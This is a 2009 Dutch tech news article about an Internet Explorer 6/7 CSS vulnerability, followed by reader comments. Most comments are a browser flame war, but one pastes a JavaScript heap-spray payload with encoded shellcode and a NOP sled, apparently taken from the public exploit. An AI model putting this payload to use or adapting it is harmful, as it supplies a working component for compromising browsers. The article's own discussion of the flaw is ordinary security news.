CSS-lek in Internet Explorer
Misbruik is kwestie van tijd
24 november 2009 | Pieterjan Van Leemputten
Microsoft onderzoekt een mogelijk lek in Internet Explorer, nadat het code heeft ontdekt die de controle van de computer kan overnemen. De aanval vindt plaats wanneer de gebruiker een besmette site bezoekt.
De code werd zonder verdere uitleg afgelopen vrijdag gepubliceerd in de Bugtrack-mailinglijst. Microsoft bevestigt intussen dat het gevaar alleen Internet Explorer 6 en 7 treft. Internet Explorer 8 blijft buiten schot.
“Het lek mikt op een kwetsbaarheid in de manier waarop Internet Explorer CSS informatie gebruikt”, weet beveiliger Symantec in een blogpost nog toe te voegen. CSS wordt vaak gebruikt om de stijl van webpagina’s eenvoudig te wijzigen.
Symantec stelt ons enerzijds gerust door te zeggen dat misbruik van het lek momenteel niet altijd even succesvol is. Anderzijds is het volgens het beveiligingsbedrijf een kwestie van tijd voor het lek wel efficiënt wordt toegepast.
In afwachting van een patch van Microsoft raadt het bedrijf aan om antivirussoftware actueel te houden en Javascript uit te schakelen.
Lees meer artikels over :
browser, internet explorer, microsoft, lek, beveiliging, symantec, css
bron: ZDNet
02/12/2009 11:49:43
Pie schreef:Naam schreef:Pie schreef:
Had ik reeds gedaan, zelfs bij webontwikkelaars. Ze hadden hetzelfde gedacht als ik.
"
Opinions are like assholes : everyone is entitled to one".
Verklaar je dus nader.
Firefox opent pokketraag, vreet resources, heeft voor elke optie een plugin nodig, heeft een afschuwelijke fontweergave en de layout is hondslelijk
Windows 7, I presume ?
-
Snelheid :
Ter vergelijking, op Moblin (CPU : Atom 1.6 GHz) start Firefox in een 2 tot 3 seconden. Ter info : Moblin zelf start (na BIOS koude start) in een zevental seconden op.
-
Resources-verbruik :
http://exo-blog.blogspot.com/2008/09/internet-explorer-8-over-2x-fatter-than.htmlhttp://exo-blog.blogspot.com/2008/09/google-chrome-fattest-of-them-all.htmlhttp://dotnetperls.com/chrome-memory-
Plugins :
De meesten beschouwen die modulariteit als �©�©n van de sterkste punten (je installeert enkel wat je nodig hebt)
-
Fonts :
Geen idee hoe jij je fontweergave geconfigureerd hebt.
-
Layout :
Huh ? Je kunt Firefox volledig reskinnen ; ook zijn alle toolbars volledig aanpasbaar.
En wat is precies de kritiek van die zgn. webontwikkelaars ? Firefox is niet conform aan webstandaarden ?
02/12/2009 09:01:49
Naam schreef:Pie schreef:
Had ik reeds gedaan, zelfs bij webontwikkelaars. Ze hadden hetzelfde gedacht als ik.
"
Opinions are like assholes : everyone is entitled to one".
Verklaar je dus nader.
Firefox opent pokketraag, vreet resources, heeft voor elke optie een plugin nodig, heeft een afschuwelijke fontweergave en de layout is hondslelijk
27/11/2009 11:37:19
X.-Man schreef:Pie schreef:
Proficiat met uw google-capaciteiten om IE exploits te vinden. Heb ik beweert dat IE goed gerief is?
Ik kan niet volgen. Wil graag weten waarom deze code nu eigenlijk schadelijk is en wat ze doet.
Wss gewoon buffer overflow en geeft crash internet explorer.
26/11/2009 20:44:21
Pie schreef:
Had ik reeds gedaan, zelfs bij webontwikkelaars. Ze hadden hetzelfde gedacht als ik.
"
Opinions are like assholes : everyone is entitled to one".
Verklaar je dus nader.
26/11/2009 10:23:01
Pie schreef:
Proficiat met uw google-capaciteiten om IE exploits te vinden. Heb ik beweert dat IE goed gerief is?
Ik kan niet volgen. Wil graag weten waarom deze code nu eigenlijk schadelijk is en wat ze doet.
26/11/2009 10:02:31
Proficiat met uw google-capaciteiten om IE exploits te vinden. Heb ik beweert dat IE goed gerief is?
26/11/2009 09:45:16
Pie schreef:
Had ik reeds gedaan, zelfs bij webontwikkelaars. Ze hadden hetzelfde gedacht als ik.
En wat zeggen die over deze code :
- Code: Selecteer alles
<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
26/11/2009 09:38:14
Had ik reeds gedaan, zelfs bij webontwikkelaars. Ze hadden hetzelfde gedacht als ik.
25/11/2009 18:11:59
Pie schreef:
ps: ik ****** op firefox
Jouw darmfuncties interesseren me voor geen meter.
Het is niettemin duidelijk dat je - alvast wat browsers betreft - wat elementaire hulp behoeft.
Dat is geen schande : niet iedereen kan een professionele IT-er zijn. Leg je oor eens te luisteren bij enkele vakmensen uit de sector ; ik veronderstel dat er zelfs hier op de ZDnet-fora zich wel enkelen onledig houden.
25/11/2009 14:35:11
Pie schreef:
ps: ik ****** op firefox
Miljaar, die scatologie is besmettelijk.
25/11/2009 14:29:29
Naam schreef:Pie schreef:En FireFox is lekvrij? Hehe
Haarscherpe logica.
Jij bent �©�©n van die grote lichten
die het nut van veiligheidsgordels niet inziet, daar je ook m�©t gordels een dodelijk ongeluk kunt krijgen ?
Euh, ja dat was mijn punt
ps: ik ****** op firefox
25/11/2009 11:18:08
Naam schreef:Pie schreef:En FireFox is lekvrij? Hehe
Haarscherpe logica.
Jij bent �©�©n van die grote lichten
die het nut van veiligheidsgordels niet inziet, daar je ook m�©t gordels een dodelijk ongeluk kunt krijgen ?
Kan er eens iemand die CODE bekijken? Had ze op forum gesmeten maar Avast geeft al alarm.
25/11/2009 11:08:41
Pie schreef:En FireFox is lekvrij? Hehe
Haarscherpe logica.
Jij bent �©�©n van die grote lichten
die het nut van veiligheidsgordels niet inziet, daar je ook m�©t gordels een dodelijk ongeluk kunt krijgen ?
24/11/2009 14:57:10
PieterD schreef:
Wtf? CSS is geen scriptingtaal of zo, hoe is het dan in godsnaam mogelijk dat CSS-code je browser hackt? Slaat nergens op.
IE slaat ook nergens op dus dat kan
Serieus: een stuk code waardoor de browser wel code in de CSS uitvoert ofwel een stuk externe code aanroept ofwel de browser kwetsbaar maakt op dat moment voor een bepaalde aanval van buitenaf. Waarom zou dat niet mogelijk zijn?
24/11/2009 14:32:47
Wtf? CSS is geen scriptingtaal of zo, hoe is het dan in godsnaam mogelijk dat CSS-code je browser hackt? Slaat nergens op.
24/11/2009 13:18:48
En FireFox is lekvrij? Hehe
24/11/2009 13:07:10
In afwachting van een patch van Microsoft raadt het bedrijf aan om antivirussoftware actueel te houden en Javascript uit te schakelen.
Een even bruikbare oplossing : "schakel je computer uit".
Even ernstig blijven : hoeveel websites werken er nog zonder Javascript ?
http://www.getfirefox.com
Blog : De Redactie
Het zijn hoogdagen voor ICANN. De organisatie krijgt bakken geld voor nieuwe toplevel domeinnamen. Maar wie staat te springen om ze te gebruiken?
lees meer »
in de kijker »
news
De opstarttijd van Windows 8 is zo kort dat er nauwelijks tijd is om in de Veilige Modus te geraken. Microsoft sleutelde daarom flink aan de bootcyclus.
lees meer »
news
In Antwerpen opent vandaag Gamebox, een project waar jongeren onder begeleiding van specialisten kunnen gaan gamen.
lees meer »
help
De webapplicatie Readlists maakt gratis e-books van door jou geselecteerde nieuwsartikelen en verstuurt ze naar je smartphone, tablet of e-reader.
lees meer »
Game
Na een ongeluk met een gevangenistransport kom je in het onheilspellende Silent Hill terecht. Wapens zijn schaars, dus zal je moeten improviseren om te overleven.
lees meer »
wedstrijden »
Win 6x Mission: Impossible - Ghost Protocol!
Doe mee »
